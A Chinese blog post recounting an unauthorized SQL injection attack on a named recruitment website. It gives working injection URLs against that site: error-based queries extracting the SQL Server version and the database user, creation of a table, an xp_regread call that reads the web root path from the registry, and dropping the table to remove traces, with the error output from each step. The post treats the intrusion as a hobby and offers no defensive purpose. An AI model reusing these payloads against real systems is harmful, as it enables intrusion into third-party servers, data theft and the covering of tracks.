攻击ASP.net网站实例

最新推荐文章于 2024-05-03 21:52:12 发布
最新推荐文章于 2024-05-03 21:52:12 发布
阅读量190 收藏 1
点赞数
分类专栏: SQL .Net 文章标签: asp.net microsoft .net asp sql server table
.Net 同时被 2 个专栏收录
18 篇文章 0 订阅
订阅专栏
SQL
3 篇文章 0 订阅
订阅专栏

今天上了一个人才招聘网站,对他们的招聘系统我很感兴趣,aspx结尾的,看来是.net的程序,这样的网站会不会有什么漏洞呢?顺便打开一条消息 http://www.cnwill.com/NewsShow.aspx?id=4847 ,然后加一个' 看看出现什么?我晕。。

  Source: .Net SqlClient Data Provider

  Description: 字符串 '' 之前有未闭合的引号。

  TargeSite: System.Data.SqlClient.SqlDataReader ExecuteReader(System.Data.CommandBehavior, System.Data.SqlClient.RunBehavior, Boolean)

  似乎有可能,然后 1=1 正常 1=2出错。。这和asp的似乎没有区别阿。。于是把NBSI挂上了,竟然也可以猜出表名来,和ASP没区别。不过NBSI不认识这里的出错信息,只能按照没有提示的方式破。。先暂停一下NBSI,输入

  http://www.cnwill.com/NewsShow.aspx?id=4844%20and%200<;>(select%20@@version)--

  提示:

  Source: .Net SqlClient Data Provider

  Description: 将 nvarchar 值 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' 转换为数据类型为 int 的列时发生语法错误。

  TargeSite: Boolean Read()

  是个2000的Enterprise server而且SP4了。。然后

  _name">http://www.cnwill.com/NewsShow.aspx?id=4844%20and%200<;>user_name()

  提示:

  Source: .Net SqlClient Data Provider

  Description: 将 nvarchar 值 'dbo' 转换为数据类型为 int 的列时发生语法错误。

  TargeSite: Boolean Read()

  哦?用dbo的身份连接?应该有搞头。。

  首先按照破解ASP网站的方法,要他的绝对路径用以下,第一步建立一个表:

  http://www.cnwill.com/NewsShow.aspx?id=4844;create%20table%20[dbo].[cyfd]([gyfd][char](255))--

  把web路径写进去

  http://www.cnwill.com/NewsShow.aspx?id=4844;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM/CONTROLSet001/Services/W3SVC/Parameters/Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);--

  还是让他不匹配,显示错误

  http://www.cnwill.com/NewsShow.aspx?id=4844 and 1=(select count(*) from cyfd where gyfd >1)

  得到提示:

  Source: .Net SqlClient Data Provider

  Description: 将 varchar 值 'Y:/Web/烟台人才热线后台管理系统,,201 ' 转换为数据类型为 int 的列时发生语法错误。

  TargeSite: Boolean Read()

  哈哈哈。。路径暴露了。。

  接下来删除痕迹

  http://www.cnwill.com/NewsShow.aspx?id=4844;drop%20table%20cyfd;--

  后边该怎么做就不多说了。。和攻击ASP的网站一样。。

zx_values
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ASP.NET防止SQL注入的方法示例
01-20
本文实例讲述了ASP.NET防止SQL注入的方法。分享给大家供大家参考,具体如下: 最近接手别人一个项目,发现存在SQL注入漏洞,因为不想改太多代码,所以那种参数法防注入呢我就用不着了。只能用传统的笨一点的办法了。...
Asp.net跨站脚本攻击XSS实例分享
每一天都有新的希望
10-10 6874
Asp.net跨站脚本攻击XSS实例分享
ASP.NET Core 面试题整理
一个有料的码农
01-25 6520
希望通过这些面试题巩固一下基础知识,加油,骚年!
asp.net 防止SQL注入攻击
逐日者的博客
03-09 1610
asp.net网站防止SQL注入攻击,只要做到以下三点,网站就会比较安全了而且维护也简单。 一般的办法是每个文件都修改加入过滤代码,这样很不方便,下面介绍一种方法,可以从整个网站防止注入。 一、Web.config 在你的Web.config文件中,在下面增加一个标签,如下:
asp.net登录界面制作实例
张亚运的专栏
12-13 8043
类库代码如下: using System; using System.Collections.Generic; using System.Linq; using System.Web; using System.Data.SqlClient; using System.Configuration; using System.Data; /// ///CommonClass 的摘要说明 ///
ASP.NET网络数据库开发实例精解.part1
06-19
ch14\Example_14_2~ Example_14_5 ---- 第14章中的数据库安全和ASP.NET中的安全,如防止SQL注入攻击、使用信任连接、使用存储过程控制数据库的访问和使用ASP.NET中的Forms验证方式; ch14\DBSecurity ---- 第14章中...
asp.net知识库
06-18
ASP.NET2.0中themes、Skins轻松实现网站换肤! ASP.NET 2.0 中的代码隐藏和编译 ASP.NET 2.0 Language Swithcer and Theme Swicher 多语言转换和多样式主题转换 ASP.NET2.0 ObjectDataSource的使用详解(1) ASP.NET...
ASP.NET网络数据库开发实例精解.part2
06-19
ch14\Example_14_2~ Example_14_5 ---- 第14章中的数据库安全和ASP.NET中的安全,如防止SQL注入攻击、使用信任连接、使用存储过程控制数据库的访问和使用ASP.NET中的Forms验证方式; ch14\DBSecurity ---- 第14章中...
XSS攻击实例1
01-11
简单让你了解xss攻击。 项目基于Asp.net 框架,VS2010下创建,C#语言
ASP.NET通用作业批改系统设计
大叔_爱编程 的博客
05-01 1164
该系统采用B/S结构,以浏览器方式登陆系统,用ASP.NET作为开发语言,数据库则使用Microsoft SQL Server 2000实现。《通用作业批改系统》包括了学生子系统、教师子系统、管理员子系统三大模块,该系统主要完成学生,教师,管理员的登陆,作业的提交,批改等功能,具有操作简单、界面友善、灵活性好、系统安全性高、运行稳定等特点。 本文简要介绍了《通用作业批改系统》的项目背景和意义,着重阐述了该系统的设计实现过程与该系统数据库的设计实现过程;从系统的需求分析、模块设计、数据库设计到系统实现等各个环
ASP.NET图书馆管理信息系统
大叔_爱编程 的博客
05-02 1345
本文首先阐述了基于.NET Framework平台的图书馆管理信息系统的开发背景以及其实践意义,其次说明了图书馆管理信息系统的功能以及相比同类软件的创新之处。然后就图书馆管理系统开发中所使用的一些的技术进行研究探讨。主要针对数据库的设计技术、存储过程技术、ADO.NET技术以及用SQL Server .NET Framework 数据提供程序访问SQLserver2000数据库技术四个方面进行了研究。最后还附上了图书馆管理信息系统的安装说明、简单使用说明和一些通用性的经典代码。笔者化了大量的时间用于程序设计
ASP.NET网络在线考试系统
最新发布
大叔_爱编程 的博客
05-03 1094
网络考试系统正是迎合这一时常需求而开发的,它旨在探索一种以互联网为基础的考试模式。通过这种新的模式,为学校创造一种新的考试环境,使考务管理突出失控的局面,提高考试工作效果和标准水平,是学校管理者、教师和学生可以随时随地通过网络进行考试。 本系统实现了管理员的后台学生和题库管理,学生前台考试,成绩查询等功能。 关 键 字:考试系统;网络考试系统;ASP.NETSQL SERVER2000
ASP.NET网络商店设计与实现
大叔_爱编程 的博客
05-02 1136
在介绍以上基础知识的基础上,论文主要分析了系统设计的两个关键步骤:概要设计和详细设计。概要设计分成后台数据库管理操作设计和客户端操作设计,同时介绍了数据库的建立和维护。详细设计主要阐述了用户管理、商品管理、交易结算过程、模糊查寻等后台管理功能的实现,并给出了系统的设计代码。 最后,对每个功能模块和整个系统进行了测试,测试结果表明:系统基本具备了网上交易的功能以及快速的响应速度。 关键词:电子商务;后台管理;ASP.NET;ACESS
ASP.NET实验室预约系统的设计
大叔_爱编程 的博客
04-29 1688
实验室预约系统的设计主要是基于B/S模型,在Windows系统下,运用ASP.NET平台和SQLServer2000数据库实现实验室预约功能。该设计主要实现了实验室的预约和管理功能。预约功能包括老师对实验室信息、实验项目和实验预约情况的查询以及对实验室的预约;学生对老师预约情况和实验项目预约情况的查询以及学生对实验的预约。管理功能包括教师、学生、管理员三者的登录、注册、个人资料管理,管理员对实验室的管理与对学生和教师预约信息的删除功能。最后通过调试、完善该系统,基本实现了高校实验室预约、管理功能,为各大学的
【neteq】tgcall的调用、neteq的创建及接收侧ReceiveStatisticsImpl统计
突围
05-03 92
neteq
C#面:ASP.NET 的身份验证方式有哪些
那个那个鱼的博客
05-02 531
C# ASP.NET 提供了多种身份验证方式,常用的有以下几种:
ASP.NET数据存储与交换系统设计
大叔_爱编程 的博客
04-30 1153
该系统以Microsoft Visual Studio 2003作为开发工具,选用SQL Server 2000数据库来实现数据存储,并设计开发了一种基于B/S模式的数据存储与交换系统。该系统完成了用户注册管理、后台管理和用户空间管理功能;为每个用户提供了个人的存储空间;用户可以通过浏览器实现文件的上传、下载和资源的共享;根据用户空间等级限制用户存储空间的大小;为用户共享文件提供积分制;通过积分制来对用户空间升级实行优惠。最后通过测试,基本满足了用户的需求,但还需要进一步完善,才可以应用于实际中。
C#面:如何部署 ASP.NET 页面
那个那个鱼的博客
05-03 286
在C#中部署 ASP.NET 页面有几种常见的方式,下面我将介绍其中两种常用的方式:
asp.net开发实例大全 提高卷 光盘iso
08-02
ASP.NET开发实例大全是一本教程,涵盖了广泛的ASP.NET开发实例,旨在帮助开发人员快速了解和掌握ASP.NET的各种应用场景和技术细节。该书包含了大量的实用案例,如网站开发、Web应用程序开发、数据库应用程序开发等。通过学习这些实例,读者可以获得丰富的实战经验和技能,提高自己的开发能力。 这本书是以光盘ISO的形式提供的。光盘ISO是一个光盘镜像文件,包含了光盘的完整内容。读者可以通过光盘ISO文件将相关代码、示例文件和其他资源复制到计算机上。这样,读者就可以方便地查阅和使用书中的实例代码,进行学习和实践。 如果你想提高自己的ASP.NET开发技能,ASP.NET开发实例大全是一个很好的资源。通过学习书中的实例,你可以更好地理解ASP.NET的工作原理和应用方式,了解ASP.NET的各种功能和特性。这本书的光盘ISO提供了便捷的资源访问方式,你可以随时随地查看实例代码并进行实践。同时,这本书的实例非常丰富,能够涵盖各种使用场景,帮助你提升自己的开发能力。 总而言之,ASP.NET开发实例大全是一本非常有价值的教程,通过学习其中的实例,你可以快速提升自己的ASP.NET开发技能。同时,光盘ISO的提供方式也使得你可以随时随地访问相关资源,更好地进行实践。希望你能够利用这本书来提升自己的技能,并在ASP.NET开发领域取得更大的成就。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值